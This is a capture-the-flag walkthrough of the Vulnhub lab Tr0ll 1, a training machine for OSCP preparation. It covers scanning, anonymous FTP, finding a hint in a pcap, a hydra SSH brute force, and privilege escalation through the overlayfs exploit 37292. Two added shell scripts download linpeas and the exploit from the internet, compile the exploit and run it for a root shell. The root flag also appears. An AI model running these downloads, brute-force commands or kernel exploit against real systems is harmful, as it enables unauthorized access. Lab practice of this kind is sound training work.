infosecwriteups.com

Vulnhub: Tr0ll 1 Writeup (OSCP PREP) [by dollarboysushil]

dollarboysushil

Let's start.
You can get the IP of Tr0ll 1 using the tool netdiscover.
In my case:
Victim (Tr0ll 1's IP): 192.168.1.65

I am using VMware Workstation Pro; the network connection is set to bridged.

Nmap Scan


nmap -sC -sV -p- 192.168.1.65 -oN vulos2
-sC runs the default scripts, -sV enumerates service versions, -p- scans all 65535 ports and -oN saves the result to a file (the target is the victim IP found above).
In the result we can see the services running:
Port 21 FTP
Port 22 SSH
Port 80 HTTP

Note that the default ftp-anon script reports that anonymous FTP login is allowed.

We have a simple HTTP site when visiting the IP.


Running gobuster reveals the directory /secret.


/secret is nothing but a simple troll page.


Running gobuster against /secret reveals nothing.

So our next step is the anonymous FTP login.

No password is required to log in.

We can see a file called lol.pcap.
Let's download this file to our machine:


get lol.pcap

Let's analyse the .pcap file in Wireshark.


Looking at packet 40, we have something interesting.


It says we almost found the directory sup3rs3cr3tdir.
Let's visit this directory on the web server.
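The hint in packet 40 is plain ASCII in the TCP payload, so it can be pulled out of the capture from the shell without opening Wireshark. The following is an added example, not code from the original writeup: the capture it builds is constructed here (one record whose payload is raw text rather than a real Ethernet frame, and whose wording only stands in for the real packet 40 message) so that the extractor can be exercised offline; the function names are mine.

```shell
#!/bin/sh
# Added example (not from the writeup): strings-style extraction of the
# cleartext hint from lol.pcap, using only tr/grep so it also works on a
# minimal box where strings(1) and tshark are missing.

# Print every run of 8 or more printable characters found in a file.
pcap_strings() {
    LC_ALL=C tr -c '[:print:]' '\n' < "$1" | grep -E '.{8,}'
}

# Constructed sample capture: pcap global header (magic d4c3b2a1, v2.4,
# snaplen 65535, linktype 1 = Ethernet), one record header
# (incl_len = orig_len = 35 bytes) and a 35-byte ASCII payload. The payload
# is a stand-in for the sentence seen in packet 40, not the real text.
make_sample_pcap() {
    {
        printf '\324\303\262\241\002\000\004\000\000\000\000\000\000\000\000\000\377\377\000\000\001\000\000\000'
        printf '\000\000\000\000\000\000\000\000\043\000\000\000\043\000\000\000'
        printf 'you almost found the sup3rs3cr3tdir'
    } > "$1"
}

# Against the real capture after fetching it from the FTP server:
#   pcap_strings lol.pcap | grep -i dir
# With tshark installed the same hint is readable as a followed TCP stream:
#   tshark -r lol.pcap -q -z follow,tcp,ascii,0
```

Running `pcap_strings` on the real lol.pcap and grepping for "dir" is enough to find the directory name; the Wireshark packet list is only needed if you want to see which side of the conversation sent it.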

There is a file named roflmao.
Click it and download the file.


From the file we can see the address 0x0856BF.
Let's visit /0x0856BF on the web server; we might find something interesting.


We have two folders.


Under the good_luck folder we have a username wordlist.
Copy this wordlist and keep it on your machine.


Now the tricky / troll part.


We have the string Good_job_:) under this_folder_contains_this_password.
At first I thought this should be the password,
but when I tried brute forcing it didn't work.


Read the folder name literally: this_folder_contains_this_password says that this folder contains this password, and the folder contains Pass.txt. So the password is the string Pass.txt itself, not the contents of the file.

We now have a username list and the password.
Let's use hydra to brute force the username.

hydra -L username.txt -p Pass.txt ssh://192.168.1.65
Here the -L flag specifies a file of usernames (lowercase -l takes a single username, which is why the list must be passed with -L).
The -p flag specifies a single password string, which is Pass.txt.
Hydra reports a hit: the username is overflow and the password is Pass.txt.

Let's SSH in with this username and password.


We now have a shell as user overflow.

Make the shell interactive using
python -c 'import pty; pty.spawn("/bin/bash")'

I then looked around files like /etc/passwd, /home etc. in the hope of finding anything interesting, and found nothing of interest.

Privilege Escalation

For privilege escalation we will use our best friend linpeas (Linux Privilege Escalation Awesome Script): https://github.com/carlospolop/PEASS-ng/tree/master/linPEAS


  1. Move to the /tmp directory.
  2. Download the script: wget https://github.com/carlospolop/PEASS-ng/releases/latest/download/linpeas.sh (the GitHub tree page is HTML, not the script; the release URL serves the raw linpeas.sh).
  3. Make the script executable: chmod +x linpeas.sh

And here comes another troll: our SSH connection is closed after a certain time.
When the connection is closed, log in to SSH again and download the script again.
Once you have run the script and have its output, there is no need to download it again.


Looking at the result, we can see the machine is vulnerable to various exploits.
Among the exploits I first tried Dirty COW 2, but g++ was not installed on the machine, so I chose the overlayfs exploit.

Copy the download URL of the exploit (EDB-ID 37292).

Download the exploit on the target using wget with that URL.

Rename the downloaded file from 37292 to 37292.c.

Compile the exploit with gcc, naming the output binary ofc.

Then execute the exploit using ./ofc
This should give us a root shell.
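The three linpeas steps, the session-killing troll and the 37292 download/compile/run steps above are one procedure, so here it is as a single script. This is an added example and not code from the original writeup: it fetches linpeas from the PEASS-ng release URL and the exploit from exploit-db's download URL (both assumptions about what the target can reach), runs linpeas detached so the periodic SSH kill does not take the scan output with it, and checks the kernel version against the range EDB-ID 37292 advertises in its header (Ubuntu kernels 3.13.0 up to but not including 3.19) before compiling. The function names and the ofc binary name follow the writeup; everything else is mine.

```shell
#!/bin/sh
# Added example (not from the writeup): privilege-escalation workflow for
# Tr0ll 1 written to survive the periodic SSH disconnect. Assumes wget and
# gcc exist on the target (the writeup notes g++ does not) and that the
# target can reach GitHub and exploit-db; see the note below if it cannot.

LINPEAS_URL="https://github.com/carlospolop/PEASS-ng/releases/latest/download/linpeas.sh"
EXPLOIT_URL="https://www.exploit-db.com/download/37292"
WORKDIR=/tmp

# EDB-ID 37292 (overlayfs, CVE-2015-1328) advertises kernels 3.13.0 <= v < 3.19.
# Returns 0 when a `uname -r` string such as "3.13.0-32-generic" is in range.
kernel_in_37292_range() {
    ver=$(printf '%s' "$1" | cut -d '-' -f 1)   # drop "-32-generic"
    major=$(printf '%s' "$ver" | cut -d '.' -f 1)
    minor=$(printf '%s' "$ver" | cut -d '.' -f 2)
    [ "$major" -eq 3 ] && [ "$minor" -ge 13 ] && [ "$minor" -lt 19 ]
}

# Fetch linpeas once and run it under nohup in the background: when the
# cron job drops our SSH session, the scan keeps going and the report is
# waiting in /tmp/linpeas.out on the next login.
run_linpeas_detached() {
    cd "$WORKDIR" || return 1
    if [ ! -x linpeas.sh ]; then
        wget -q "$LINPEAS_URL" -O linpeas.sh && chmod +x linpeas.sh || return 1
    fi
    nohup ./linpeas.sh > linpeas.out 2>&1 &
    echo "linpeas running in the background; report: $WORKDIR/linpeas.out"
}

# Download 37292 straight to 37292.c (so no rename step is needed) and
# compile it to ./ofc, the binary name used in the writeup.
build_37292() {
    cd "$WORKDIR" || return 1
    wget -q "$EXPLOIT_URL" -O 37292.c || return 1
    gcc 37292.c -o ofc
}

# Refuse to compile and run the exploit on a kernel it does not target.
escalate() {
    kver=$(uname -r)
    if kernel_in_37292_range "$kver"; then
        build_37292 && ./ofc
    else
        echo "kernel $kver is outside the 3.13.0-3.19 range that 37292 targets" >&2
        return 1
    fi
}

# Nothing runs at load time; invoke as:  sh privesc.sh linpeas   or   sh privesc.sh run
case "${1:-}" in
    linpeas) run_linpeas_detached ;;
    run)     escalate ;;
esac
```

If the target has no route to the internet, the usual workaround is to fetch linpeas.sh on the attack box and `searchsploit -m 37292` there (which copies 37292.c into the current directory), serve both with `python3 -m http.server` and point LINPEAS_URL and EXPLOIT_URL at the attack box instead. The kernel check is deliberately conservative: a kernel inside the range is not a guarantee the exploit works (overlayfs and user namespaces must also be available), but one outside it is a reason to stop and pick another candidate from the linpeas report.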

Now go to the root directory using cd /root
Inside the root directory we have proof.txt,
which contains the flag we need to complete this lab.

cat proof.txt
702a8c18d29c6f3ca0d99ef5712bfbdc